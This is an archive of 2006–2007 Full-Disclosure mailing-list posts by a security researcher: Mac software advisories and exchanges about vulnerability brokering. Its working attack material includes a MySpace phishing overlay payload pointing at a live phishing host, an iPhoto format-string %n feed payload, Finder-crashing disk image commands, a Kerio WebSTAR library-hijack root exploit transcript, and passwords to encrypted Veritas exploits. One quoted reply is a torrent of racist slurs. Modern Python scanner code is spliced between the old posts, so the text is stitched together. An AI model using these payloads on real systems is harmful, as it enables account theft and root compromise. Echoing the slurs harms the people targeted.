[Full-disclosure] Remove all admin-root authorization prompts from OSX

2007-01-24 Thread K F (lists)
http://www.petitiononline.com/31337OSX/petition.html

-KF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] SERIOUS PROBLEM WITH MACOS V+V HAHAHA

2007-01-24 Thread K F (lists)
Awe... someone's mad that their penis isn't even half black. I get 2 
extra inches of cock for being 1/2 black. The usual 3 inches did not 
apply for me since I am not totally black.

Go look up the word Sarcasm before you sign the petition... in fact here 
is a link for ya. http://www.answers.com/sarcasmr=67

Btw dipshit... learn to read press releases. The broker is Adriel, not 
me. I technically left SNOSoft years ago. I am nothing more than a lowly 
researcher calling out iDefense on their bullshit vuln prices. You 
really haven't said anything here that wasn't already covered in h0h0 #3 
...

Thanks
-KF

[EMAIL PROTECTED] wrote:
 HOLY FUCK SHIT DUDES CHECK OUT THIS!!!

 http://lists.grok.org.uk/pipermail/full-disclosure/2007-January/052002.html

 SERIOUSLY KF WHAT THE FUCK YOU DUMB FUCKING NIGGER 

 GO PRETEND THAT YOU'RE A BIG TIME VULN DEALER BY BEING A BROKER TO 
 A BROKER AND CONTINUING YOUR BROKER IN THE MIDDLE ATTACKS.

 I BET THE HBGARY DUDES LAUGH THEIR ASSES OFF AT YOUR NIGGER SELF 
 FOR THIS POST.  

 IF YOU WERE HALF THE HACKER YOUR BLACK HALF ISN'T DON'T YOU THINK 
 YOU COULD ACTUALLY MAKE MONEY YOURSELF INSTEAD OF TRYING TO SCAM 
 OFF OF OTHER PEOPLE WHO MIGHT BE SLIGHTLY MORE CAPABLE OF DOING 
 SECURITY RESEARCH??

 YOUR SKIN IS MORE NIGGER THAN YOUR TECHNICAL SKILLS.  WAY TO RIP 
 OFF A CROSSDRESSING HOMOSEXUAL RETARD AND GET OWNED THEN TRY TO USE 
 IT AS AN EXAMPLE OF YOU BEING ABLE TO SELL BUGS YOU WORTHLESS TWAT 
 SHIT.

 I BET YOUR MOTHER HAD HORRIBLE DIARRHOEA DURING YOUR BIRTH AND NO 
 ONE COULD TELL YOU WERE BORN SO YOU SPENT THE FIRST HOURS OF YOUR 
 LIFE DROWNING IN THE OUTHOUSE.

 ps: snosoft is going to try to sell your exploits to hbgary, so 
 just fucking bypass snosoft and contact them directly and make more 
 money

 pps: kf is a nigger

 ppps: kf claims he is only 1/2 nigger does this mean he is also a 
 failure at being a nigger  

 TOTAL FAILURE AT COMPUTER SECURITY AND TOTAL FAILURE AT BEING A 
 NIGGER!!! WHAT A NIGGER!!








Re: [Full-disclosure] SERIOUS PROBLEM WITH MACOS V+V HAHAHA

2007-01-24 Thread K F (lists)
btw... nice pussy ass hushmail account.
-KF

   



Re: [Full-disclosure] SERIOUS PROBLEM WITH MACOS V+V HAHAHA

2007-01-24 Thread K F (lists)
Sure... I was aware of an opening and inquired about it as I was trying 
to offload the Veritas bug perhaps? I am pretty sure I never directly 
applied for it or even took an interview for it. In reality I was not 
willing to relocate thus the position was not even an after thought.

hrmm how about those hushmail accounts.
-KF


 can you at least publicly admit that you tried to get a job at
 idefense?  



Re: [Full-disclosure] Grab a myspace credential

2007-01-16 Thread K F (lists)
http://www.ninjahype.org/mov/

nameHREFTrack

-KF


wac wrote:


 On 1/16/07, *Deepan* [EMAIL PROTECTED] 
 mailto:[EMAIL PROTECTED] wrote:

 On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote:
  but at some point all this abuse will likely start sending
 users off
  to another service. 
 
  thats only --if the know if they are being abused.. most of them
 are
  not coherent about any such issues..
 
 
 
  On 1/15/07, Kevin Pawloski [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:
  The level of phishing sites targeting MySpace and bot
 related
 It is not quite easy to fool 56000+ users using phishing sites. I
 wonder
 how Mark is doing it.



 Hmm... Oh no, it is very easy, yes very easy what he is doing. He left 
 some traces on some of the cracked accounts; I was expecting 
 somebody to comment earlier since it's been a couple of hours since 
 the initial post.

 When you modify a profile you can add this to the data of the profile, 
 you know those HTML customizations. I found this on one of the 
 accounts that really got my attention a little bit more than the girl 
 of the account :P

 HOLA<a style="text-decoration:none;position: absolute;top:1px;left:1px;"
 href="http://marcolano.com/login/"><img
 style="border-width:0px;width:2024px; height:1768px;"
 src="http://x.myspace.com/images/clear.gif"></a><a
 style="text-decoration:none;position: absolute;top:1px;left:1px;"
 href="http://marcolano.com/login/"><img
 style="border-width:0px;width:2024px; height:1768px;"
 src="http://x.myspace.com/images/clear.gif"></a><embed
 allowScriptAccess="never" allowNetworking="internal"
 enableJSURL="false" enableHREF="false" saveEmbedTags="true"
 src="http://www.../mov/cid_3277_f.mov" width="1" height="1">

 As you might see, this creates a huge invisible link in the page in 
 front of everything, so when you click into anything on the page like 
 a link or anything it will take you to that phishing website so ppl 
 believe that the account expired and enter their user+pass. Now I 
 believe that his message was a way to tell about a BUG in myspace that 
 should filter that content and it is not doing it. So... we are in 
 fact not talking about a stupid phishing website for those who still 
 believe that.

 Regards
 Waldo


   activity that has been targeting MySpace lately is pretty
  alarming. Granted there is no real financial risk if an
  account gets compromised for the user but at some point all
  this abuse will likely start sending users off to another
  service.
 
  Kevin
 
 
  On 1/15/07, North, Quinn [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:
  [EMAIL PROTECTED]
 :doyouhonestlythinkiwillputmyrealpass
  wordhere
 
  ...at least there is some hope left in the world :-\
 
  --=Q=--
 
  -Original Message-
  From: [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED]
  [mailto:
 [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED]] On
  Behalf Of Emma
  Perdue
  Sent: Monday, January 15, 2007 7:48 AM
  To: full-disclosure@lists.grok.org.uk
 mailto:full-disclosure@lists.grok.org.uk
  Subject: [Full-disclosure] Grab a myspace credential
 
  56000+ and counting
 
  http://www.marcolano.com/login/myspace.txt
 
  --
  *Emma aka TINK*
 
 
 
 
 
 
 
 --
 ---
 Regards
 Deepan Chakravarthy N
 
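The overlay trick Waldo describes (an absolutely positioned anchor wrapping a transparent image that covers the whole page, plus an embed) is exactly what a profile-HTML filter should catch. The following is an added example, not code from the thread or from MySpace; the sample profile markup is constructed and uses placeholder hosts.

```python
"""Sanitizer-side check for invisible click-through overlays and embeds
in user-supplied profile HTML (added example, not from the thread)."""
from html.parser import HTMLParser
import re
from typing import Dict, List, Optional

# Constructed sample modelled on the quoted profile markup; the phishing
# host is a placeholder, not the one from the thread.
SAMPLE_PROFILE = (
    '<p>About me: music, beach, friends</p>'
    '<a style="text-decoration:none;position: absolute;top:1px;left:1px;"'
    ' href="http://phish.example/login/">'
    '<img style="border-width:0px;width:2024px; height:1768px;"'
    ' src="http://x.myspace.com/images/clear.gif"></a>'
    '<embed allowScriptAccess="never" src="http://phish.example/mov/x.mov"'
    ' width="1" height="1">'
    '<a href="http://myspace.example/friend/42">my friend</a>'
)

# An overlay at least this large is treated as covering the whole page
# (assumed threshold, roughly a 2007-era screen).
MIN_HIJACK_AREA = 1024 * 768


def _px(style: str, prop: str) -> int:
    """Pixel value of `prop` in an inline style; the (^|;) anchor keeps
    compound properties such as border-width from matching width."""
    flat = style.replace(" ", "").lower()
    m = re.search(r"(?:^|;)" + re.escape(prop) + r":(\d+)", flat)
    return int(m.group(1)) if m else 0


def _attr_px(value: Optional[str]) -> int:
    """Leading integer of a width/height attribute, 0 if absent or not numeric."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else 0


class OverlayFinder(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Dict] = []
        self._anchor: Optional[Dict] = None  # absolutely positioned <a> being scanned

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "")
        if tag == "a" and "position:absolute" in style.replace(" ", "").lower():
            # Anchor pulled out of normal flow: candidate click-through overlay.
            self._anchor = {"kind": "overlay_link", "href": a.get("href"),
                            "width": 0, "height": 0}
        elif tag == "img" and self._anchor is not None:
            # Size of the (transparent) image decides how much of the page the link eats.
            w = _px(style, "width") or _attr_px(a.get("width"))
            h = _px(style, "height") or _attr_px(a.get("height"))
            self._anchor["width"] = max(self._anchor["width"], w)
            self._anchor["height"] = max(self._anchor["height"], h)
        elif tag == "embed":
            self.findings.append({"kind": "embed", "src": a.get("src")})

    def handle_endtag(self, tag):
        if tag == "a" and self._anchor is not None:
            f = self._anchor
            f["covers_page"] = f["width"] * f["height"] >= MIN_HIJACK_AREA
            self.findings.append(f)
            self._anchor = None


def audit_profile_html(html: str) -> List[Dict]:
    """Every absolutely positioned anchor (with the area it covers) and every embed."""
    p = OverlayFinder()
    p.feed(html)
    p.close()
    return p.findings


def should_reject(html: str) -> bool:
    """Filter policy: no embeds, no page-covering overlay links."""
    return any(f["kind"] == "embed" or f.get("covers_page")
               for f in audit_profile_html(html))
```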

Re: [Full-disclosure] iDefense Q-1 2007 Challenge

2007-01-16 Thread K F (lists)
[EMAIL PROTECTED] wrote:
 I agree with you KF, that's why I have not recommended iDEFENSE in my 
 forum's footer for some time now.
 They are just playing on the fact they are alone, or they were alone 
 for a long time on this market, and they do
 not wish to make any effort, making loads of dollars with us. To say it 
 clean, they suck.

 AD

I am pretty sure no one noticed that I chose to gpg encrypt the Veritas 
exploits with lines from Pop Goes the Weasel last year...

22. VERITAS-Linux.pl.gpg - 'Veritas NetBackup = 6.0 (bpjava-msvc) 
Remote Exploit (linux)'
  pass: allaroundthemulberrybush

21. VERITAS-OSX.pl.gpg - 'Veritas NetBackup = 6.0 (bpjava-msvc) Remote 
Exploit (OSX)'
  pass: themonkeychasedtheweasel

20. VERITAS-WIN32.pl.gpg - 'Veritas NetBackup = 6.0 (bpjava-msvc) 
Remote Exploit (WIN32)'
  pass: apennyforaneedle

Check the interpretations section on Wikipedia for a hint as to why I 
may have done that.
(hint: it has something to do with getting paid in peanuts!)

http://en.wikipedia.org/wiki/Pop_Goes_the_Weasel

-KF



Re: [Full-disclosure] iDefense Q-1 2007 Challenge

2007-01-16 Thread K F (lists)
No offense to iDefense as I have used their services in the past... but 
MY Q1 2007 Challenge to YOU is to start offering your researchers more 
money in general! I've sold remotely exploitable bugs in random 3rd 
party products for more $$ than you are offering for these Vista items 
(see the h0n0 #3). I really think you guys are devaluing the exploit 
market with your low offers... I've had folks mail me like WOW iDefense 
offered me $800 for this remote exploit. Pfffttt not quite.

We all know black hats are selling these sploits for =$25k so why 
should the legit folks settle for anything less? As an example the guys 
at MOAB kicked around selling a Quicktime bug to iDefense but in the end 
we decided it was not worth it due to low pay...

Low Pay == Not getting disclosed via iDefense

-KF


 I know someone who will pay significantly more per vulnerability against the
 same targets. 


 On 1/10/07 12:27 PM, contributor [EMAIL PROTECTED] wrote:

 -----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1

 Also available at:
 http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+challenge

 *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in
 Vista & IE 7.0*

 Both Microsoft Internet Explorer and Microsoft Windows dominate their
 respective markets, and it is not surprising that the decision to
 update to the current release of Internet Explorer 7.0 and/or Windows
 Vista is fraught with uncertainty. Primary in the minds of IT security
 professionals is the question of vulnerabilities that may be present in
 these two groundbreaking products.

 To help assuage this uncertainty, iDefense Labs is pleased to announce
 the Q1, 2007 quarterly challenge.

 Remote Arbitrary Code Execution Vulnerabilities in Vista and IE 7.0

 Vulnerability Challenge:
 iDefense will pay $8,000 for each submitted vulnerability that allows
 an attacker to remotely exploit and execute arbitrary code on either of
 these two products. Only the first submission for a given vulnerability
 will qualify for the award, and iDefense will award no more than six
 payments of $8000. If more than six submissions qualify, the earliest
 six submissions (based on submission date and time) will receive the
 award. The iDefense Team at VeriSign will be responsible for making the
 final determination of whether or not a submission qualifies for the
 award. The criteria for this phase of the challenge are:

 I) Technologies Covered:
 - Microsoft Internet Explorer 7.0
 - Microsoft Windows Vista

 II) Vulnerability Challenge Ground Rules:
 - The vulnerability must be remotely exploitable and must allow
   arbitrary code execution in a default installation of one of the
   technologies listed above
 - The vulnerability must exist in the latest version of the affected
   technology with all available patches/upgrades applied
 - 'RC' (Release candidate), 'Beta', 'Technology Preview' and similar
   versions of the listed technologies are not included in this
   challenge
 - The vulnerability must be original and not previously disclosed
   either publicly or to the vendor by another party
 - The vulnerability cannot be caused by or require any additional
   third party software installed on the target system
 - The vulnerability must not require additional social engineering
   beyond browsing a malicious site

 Working Exploit Challenge:
 In addition to the $8000 award for the submitted vulnerability,
 iDefense will pay from $2000 to $4000 for working exploit code that
 exploits the submitted vulnerability. The arbitrary code execution
 must be of an uploaded non-malicious payload. Submission of a
 malicious payload is grounds for disqualification from this phase of
 the challenge.

 I) Technologies Covered:
 - Microsoft Internet Explorer 7.0
 - Microsoft Windows Vista

 II) Working Exploit Challenge Ground Rules:
 Working exploit code must be for the submitted vulnerability only -
 iDefense will not consider exploit code for existing vulnerabilities
 or new vulnerabilities submitted by others. iDefense will consider
 one and only one working exploit for each original vulnerability
 submitted.

 The minimum award for a working exploit is $2000. In addition to the
 base award, additional amounts up to $4000 may be awarded based upon:
 - Reliability of the exploit
 - Quality of the exploit code
 - Readability of the exploit code
 - Documentation of the exploit code


[Full-disclosure] DMA[2007-0107a] OmniWeb Javascript Alert Format String Vulnerability and DMA[2007-0109a] Apple Finder Disk Image Volume Label Overflow / DoS

2007-01-10 Thread K F (lists)
I've been subject to a few DoS attacks as of late so these did not quite 
make it out. Enjoy the typos as usual. =P


-KF

DMA[2007-0109a] - 'Apple Finder Disk Image Volume Label Overflow / DoS'
Author: Kevin Finisterre
Vendor(s): http://www.apple.com
Product: '= OSX 10.4 (?)'
References: 
http://www.digitalmunition.com/DMA[2007-0109a].txt
http://www.apple.com/macosx/features/finder/
http://projects.info-pull.com/moab/MOAB-09-01-2007.html

Description:
Your home on the Mac, Finder gives you lots of options for locating, displaying 
and organizing all your files and folders. From the power of Spotlight search 
technology to the flexibility of customizable item views, Mac OS X Finder truly 
shows your Mac at a glance.

You can really piss Finder off in several ways by passing long volume labels to 
various types of disk images. Here is the hex dump of an example label that can 
be used to trigger the issue. 


Creating the images is something fairly easy to do. Each command below builds an 
image whose volume name is 255 'A' characters:

$ hdiutil create -sectors 31337 -type SPARSE -fs HFS+ -volname `perl -e 'print "A" x 255'` -layout NONE test.sparseimage

$ hdiutil create test.dmg -size 01m -fs HFS+ -volname `perl -e 'print "A" x 255'`

$ hdiutil create test.dmg -size 200k -fs UFS -volname `perl -e 'print "A" x 255'`

Attach gdb to Finder and open any of the above .dmg files and you will see the 
following crash. 

(gdb) bt
#0  0x0ac4 in ___memcpy () at 
/System/Library/Frameworks/System.framework/PrivateHeaders/i386/cpu_capabilities.h:228
#1  0x90c93952 in _FSCopyExtendedAliasInfoFromAliasPtr ()
#2  0x9252939d in TNode::CreateVirtualAliasRecord ()
#3  0x92528872 in TNode::PopulateVirtualContainerFromSFL ()
#4  0x92513343 in TNodeSyncTask::SyncTaskProc ()
#5  0x90cb3f84 in PrivateMPEntryPoint ()
#6  0x90023d87 in _pthread_body ()

See Alastair's blog (http://alastairs-place.net) in about 3 days for an 
explanation of exploitability.

Workaround: 
Do not mount disk images, or simply disable Finder and use Spotlight instead. 

1. Open Terminal, found in /Applications > Utilities, and then type 
   'sudo mv /System/Library/CoreServices/Finder.app /Applications/' 

2. Still in Terminal, type 'killall Finder'. This kills the process named 
   Finder, and it should not restart! Note that this does not affect the Dock 
   or Exposé.

The following command will unmount a disk image in the event that your Finder 
has been put into a DoS condition. 
$ hdiutil unmount /Volumes/A/


DMA[2007-0107a] - 'OmniWeb Javascript Alert Format String Vulnerability'
Author: Kevin Finisterre
Vendor(s): http://www.omnigroup.com
Product: 'OmniWeb 5.51 (?)'
References: 
http://www.digitalmunition.com/DMA[2007-0107a].txt
http://www.omnigroup.com/applications/omniweb/
http://projects.info-pull.com/moab/MOAB-07-01-2007.html
http://www.omnigroup.com/applications/omniweb/download/
http://blog.omnigroup.com/2007/01/07/omniweb-552-now-available-and-more-secure/

Description:
You're a Mac fan, right? When people ask you why you like the Mac, you probably 
think of the attention to detail that makes the Mac user experience superior. 
It's the sum of a lot of different things that add up to a system that's more 
powerful, more beautiful, and more fun.

What if you thought of a web browser in the same way? You use a web browser all 
the time, for working, for entertainment, for research; how cool would it be if 
every time you used it, you thought "Wow, this rules!"

Welcome to OmniWeb. OmniWeb elevates your web user experience to be more 
productive, more efficient, and more fun. You'll find information more quickly. 
You'll stay organized. You'll see the entire internet the way you choose. It's 
the browser that puts you in control.

Sure, you can use a standard web 

[Full-disclosure] Flaaaaaaaaaaaaaaaaavor Flav! (todays MOAB)

2007-01-05 Thread K F (lists)
http://projects.info-pull.com/moab/MOAB-05-01-2007.html



[Full-disclosure] DMA[2007-0104a] - 'iLife iPhoto Photocasting Format String Vulnerability'

2007-01-04 Thread K F (lists)


DMA[2007-0104a] - 'iLife iPhoto Photocasting Format String Vulnerability'
Author: Kevin Finisterre
Vendor(s): http://www.apple.com
Product: 'iLife 06 (?)'
References: 
http://www.digitalmunition.com/DMA[2007-0104a].txt
http://www.apple.com/ilife/iphoto/features/photocasting.html
http://projects.info-pull.com/moab/MOAB-04-01-2007.html

Description:
Rebuilt for blazing performance, iPhoto makes sharing photos faster, simpler, 
and cooler than ever before. It adds eye-opening features to the ones you 
already love, including Photocasting, support for up to 250,000 photos, easy 
publishing to the web, special effects, and new custom cards and calendars. In 
essence iPhoto lets you spread smiles far and wide.

As easily as you can create a new photo album you can share it with friends and 
family thousands of miles away. A new feature in iPhoto 6, Photocasting allows 
.Mac members to share albums with anyone, anywhere. Say you have new photos of 
little Johny Pwnerseed. Place the photos you'd like to share in an album called 
"Johny Pwnerseed's Latest Pics", then click "Photocast this Album". iPhoto 
publishes the album, and others can subscribe to it by clicking a link in an 
email you send.

But here's where the real fun begins. If you create a malformed XML file you 
can simulate the photocasting functionality in iPhoto 6 and use it to trigger a 
format string vulnerability. Once Aunt Sophia subscribes, the fake photo feed 
is automatically downloaded into a "Johny Pwnerseed's Latest Pics" album that 
instantly triggers a format string write via %n. 

We're talking beautiful, full-res pwnage. Aunt Sophia is pretty much screwed if 
you are able to properly format your payload. 

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:aw="http://www.apple.com/ilife/wallpapers">
<channel>
<title>%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%n.%n.%n.%n.%n.%n</title>
<item>
<title>Welcome to Pwndertino!</title>
<aw:image>http://www.digitalmunition.com/digital_munitions_detonator.jpg
</aw:image>
</item>
</channel>
</rss>

Host Name:  Aunt-Sophias-computer
Date/Time:  2006-12-04 19:52:51.035 -0500
OS Version: 10.4.8 (Build 8L2127)
Report Version: 4

Command: iPhoto
Path:/Applications/iPhoto.app/Contents/MacOS/iPhoto
Parent:  WindowServer [83]

Version:6.0.5 (6.0.5)
Build Version:  2
Project Name:   iPhotoProject
Source Version: 316

PID:438
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:  KERN_PROTECTION_FAILURE (0x0002) at 0x00389ddc

Thread 0 Crashed:
0   libSystem.B.dylib          0x9000c0c1 __vfprintf + 4976
1   libSystem.B.dylib          0x90100ea9 snprintf_l + 504
2   com.apple.CoreFoundation   0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3   com.apple.CoreFoundation   0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4   com.apple.Foundation       0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5   com.apple.Foundation       0x92678e6c +[NSString localizedStringWithFormat:] + 129
6   com.apple.iPhoto           0x0002ae3a 0x1000 + 171578
7   com.apple.iPhoto           0x0031298f 0x1000 + 3217807

Workaround:
Unregister the iphoto:// URL handler with RCDefaultApp

Check out Landon's website... he has been on the ball the last few days. 
http://landonf.bikemonkey.org/

He has also set aside a google group for MOAB issues. 
http://groups-beta.google.com/group/moabfixes?hl=en

http://www.apple.com/support/security/
http://docs.info.apple.com/article.html?artnum=61798
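The crash above is the classic shape of the bug: feed text ends up as the format argument of +[NSString localizedStringWithFormat:], so every %x reads the stack and every %n writes to it. Added example, not Apple's or the advisory's code: a scanner that walks a photocast feed and flags any element text or attribute carrying printf/NSString conversion specifiers, which is the check a feed consumer (or a proxy in front of one) can run before handing strings to anything format-like. The sample feeds are constructed and the second only mirrors the shape of the post's trigger.

```python
"""Scan a photocast/RSS feed for printf-style conversion specifiers in
text a client might use as a format string (added example, not from the
advisory)."""
import re
import xml.etree.ElementTree as ET
from typing import Iterator, List, Tuple

# A conversion spec as printf/CFString parse it: flags, width, precision,
# length modifier, then one conversion character (%@ is the NSString one).
SPEC = re.compile(
    r"%(?:%|[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?(?:hh|h|ll|l|q|L|z|t|j)?"
    r"[diouxXeEfFgGaAcspn@])"
)

# Constructed feeds (not the advisory's file); HOSTILE_FEED has the same
# layout as the trigger in the post, with a shorter specifier chain.
BENIGN_FEED = """<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:aw="http://www.apple.com/ilife/wallpapers">
<channel><title>Summer 2006, 100 percent fun</title>
<item><title>Beach day</title><aw:image>http://photos.example/1.jpg</aw:image></item>
</channel></rss>"""

HOSTILE_FEED = """<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:aw="http://www.apple.com/ilife/wallpapers">
<channel><title>%x.%x.%x.%n.%n</title>
<item><title>Welcome to Pwndertino!</title>
<aw:image>http://photos.example/detonator.jpg</aw:image></item>
</channel></rss>"""


def format_specifiers(text: str) -> List[str]:
    """Conversion specs in `text`, with the harmless %% escape dropped."""
    return [m.group(0) for m in SPEC.finditer(text) if m.group(0) != "%%"]


def _walk(elem: ET.Element, prefix: str = "") -> Iterator[Tuple[str, ET.Element]]:
    """Yield (path, element) pairs with namespaces stripped from tag names."""
    name = elem.tag.rsplit("}", 1)[-1]
    path = f"{prefix}/{name}" if prefix else name
    yield path, elem
    for child in elem:
        yield from _walk(child, path)


def scan_feed(xml_text: str) -> List[Tuple[str, List[str]]]:
    """Every element text or attribute value that carries a format specifier."""
    findings = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for path, elem in _walk(root):
        slots = [("", elem.text)] + [(f"@{k}", v) for k, v in elem.attrib.items()]
        for suffix, value in slots:
            specs = format_specifiers(value or "")
            if specs:
                findings.append((path + suffix, specs))
    return findings


def write_primitives(findings: List[Tuple[str, List[str]]]) -> int:
    """Total %n specs: each one is a write to memory if the text reaches a format call."""
    return sum(specs.count("%n") for _, specs in findings)
```

On the consumer side the fix is the usual one: pass feed text as a %@ argument, never as the format itself.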




Re: [Full-disclosure] Perforce client: security hole by design

2007-01-03 Thread K F (lists)

 Sometimes, the track record is only good because nobody looked into it.
   
Nice quote...

-KF



[Full-disclosure] Whos Johny Pwnerseed?

2007-01-02 Thread K F (lists)
You may still be scratching your head from yesterday... don't forget 
about today and tomorrow:

http://projects.info-pull.com/moab/MOAB-02-01-2007.html

-KF



[Full-disclosure] Welcome to Pwndertino...

2007-01-01 Thread K F (lists)
Just in case you are drunk / hungover / out of town or whatever... this is a 
friendly reminder that MOAB has begun. 

http://projects.info-pull.com/moab/index.html

-KF 




Re: [Full-disclosure] Sacure Enterprise Security - Real Company!

2006-12-26 Thread K F (lists)
Sheesh... funny that this chump said he was in with the individual that 
single handedly started the HP / DMCA fiasco.
Since that person is most likely ME (or a former employee of mine) and I 
have never heard of this guy I got a good belly laugh out of this.

So Jeff... do me a favor buddy... keep my name out your mouth. You don't 
know me (queue song by T.I). 
-KF


[EMAIL PROTECTED] wrote:
 I am a CTO of a large company in NYC and have been very satisfied 
 with Sacure Enterprise Security www.sacure.com and the staff.  They 
 were responsive, professional and credible.

 Initially, Jeff fed me the same lines but he was apparently fired, 
 (sometime over the summer), and the President contacted me 
 afterwards to follow-up. Since, I have been dealing with a new rep 
 and have been nothing but satisfied with the professionalism at 
 Sacure.

 Hope this helps.





Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread K F (lists)
a douchebag?

I dunno but why the hell aren't your boxes patched to Sasser yet?

-KF


deep fried wrote:
 What am I
  
 Consultant?
 School Teacher?
 Terrorist?
  
  


  
 On 11/27/06, *K F (lists)* [EMAIL PROTECTED] 
 mailto:[EMAIL PROTECTED] wrote:

 Dude... settle the hell down.

 I see little problem with this guy doing this on a closed LAN in a
 lab
 setting. What part of CLOSED LAB did you miss? Its not like he is
 intentionally letting it loose on the entire school LAN.

 -KF

 [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote:
  Chris -
 
  I don't know what to make of your please reply off-list; I'm
 not a member
  comment.
  It's almost as ridiculous as what you are requesting.
 
  If I take your question at face value, you are an INSTRUCTOR,
 not an Admin.
  That means you probably teach an A+ class, maybe an abbreviated CCNA
  program.
 
  You have NO FUCKING BUSINESS WHATSOEVER even THINKING about
 turning loose a
  dangerous piece of Malware in someone else's network. And it IS
 someone
  else's network; specifically it belongs to the district.
 
  Speaking as a network engineer for a large midwestern
 school district, if you
  did that in MY network, I'd have your job. GOD HELP YOU if it
 turns out
  that you actually ARE a teacher in my district. I don't
 recognize the name,
  but you can bet your ass that every time we have an infection in
 one of our
  schools from now until the stars burn out; that I'll be making a
 point of
  asking who the computer teachers are in that building.
 
  You want to teach these kids a lesson? Write it on the blackboard.
 
  We have enough work to do just keeping up with the kids, without
 an alleged
  professional turning loose a worm in our network.
 
 
  =
  I'm a high school network administration teacher
  looking for a creative means of teaching my students
  the importance of patch management.  I was hoping to
  let a particularly nasty worm loose on a closed lab
  so my students could see what happens during an outbreak,
  but I'm running into a hitch - I can't find a worm that
  would spread quickly enough to be useful.
 
  Does anyone have a copy of Sasser or a similar worm
  that they would be willing to send or link me to?
  Please contact me off-list.  I would be happy to
  verify my identity as a high school teacher off-list
  as I'm sure that is a concern for most anyone who has
  what I am looking for.
 
  Please do not reply on list as I am not currently a member.
  Thank you,
  Chris
  
 
  
  mail2web - Check your email from the web at
  http://mail2web.com/ .
 
 
 
 



 




[Full-disclosure] Kerio WebSTAR local privilege escalation

2006-11-15 Thread K F (lists)


DMA[2006-1115a] - 'Kerio WebSTAR local privilege escalation'
Author: Kevin Finisterre
Vendor(s): http://www.kerio.com/webstar_home.html
Product: 'Kerio WebSTAR = 5.4.2 (?)'
References: 
http://www.digitalmunition.com/DMA[2006-1115a].txt

Description:
Kerio WebSTAR is an easy-to-use web server for Mac OS X. Acquired in January 
2006 from 4D, Kerio WebSTAR 5 (formerly known as 4D WebSTAR Server Suite) helps 
small companies run Internet and intranet websites and integrate them with 
databases.

Upon installing Kerio WebSTAR you will find that you have inherited two setuid 
binaries in /Applications:

kevin-finisterres-computer:~/Desktop kf$ find /Applications/Kerio\ WebSTAR -perm -4000 -ls
978790 3016 -rwsrwx--x 1 root admin 1542556 Apr 10 2006 /Applications/Kerio WebSTAR/AdminServer/WSAdminServer
979475 3288 -rwsrwx--- 1 root admin 1679724 Apr 10 2006 /Applications/Kerio WebSTAR/WebServer/WSWebServer

If an attacker is able to gain access to either the webstar user or the admin 
group, he or she may be able to execute code as root by abusing the binaries 
mentioned above. For some odd reason both binaries try to load a helper library 
from within the current directory. In most cases this is obviously not a good 
idea because an attacker can simply provide the application with the trojaned 
library of his choice. 

kevin-finisterres-computer:~ kf$ /Applications/Kerio\ 
WebSTAR/WebServer/WSWebServer
dyld: Library not loaded: libucache.dylib
  Referenced from: /Applications/Kerio WebSTAR/WebServer/WSWebServer
  Reason: image not found
Trace/BPT trap

kevin-finisterres-computer:~ kf$ /Applications/Kerio\ 
WebSTAR/AdminServer/WSAdminServer  
dyld: Library not loaded: libucache.dylib
  Referenced from: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer
  Reason: image not found
Trace/BPT trap

ktrace gives a better look at what is going on... 

  1183 WSAdminServer CALL  open(0x17e8,0,0)
  1183 WSAdminServer NAMI  libucache.dylib
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0x)
...
  1183 WSAdminServer CALL  open(0xbfffea90,0,0)
  1183 WSAdminServer NAMI  /var/root/lib/libucache.dylib
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0x)
  1183 WSAdminServer RET   close -1 errno 9 Bad file descriptor
  1183 WSAdminServer CALL  open(0xbfffea90,0,0)
  1183 WSAdminServer NAMI  /usr/local/lib/libucache.dylib
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0x)
  1183 WSAdminServer RET   close -1 errno 9 Bad file descriptor
  1183 WSAdminServer CALL  open(0xbfffeaa0,0,0)
  1183 WSAdminServer NAMI  /usr/lib/libucache.dylib
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0x)

Exploitation is pretty cut and dry: change directories to a folder that you can 
write to, compile your helper library, and take root. 

kevin-finisterres-computer:/tmp kf$ ./kerio_WebSTAR_pwn.pl 

Usage: ./kerio_WebSTAR_pwn.pl target 

Targets:

0 . kerio-webstar-5.4.2-mac.bin - WSAdminServer
1 . kerio-webstar-5.4.2-mac.bin - WSWebServer

kevin-finisterres-computer:/tmp kf$ ./kerio_WebSTAR_pwn.pl 0
*** Target: kerio-webstar-5.4.2-mac.bin - WSAdminServer, Binary: 
/Applications/Kerio WebSTAR/AdminServer/WSAdminServer
/tmp/kerio_pwn.c: In function 'kerio_pwned':
/tmp/kerio_pwn.c:2: warning: incompatible implicit declaration of built-in 
function 'exit'
sh-2.05b# id
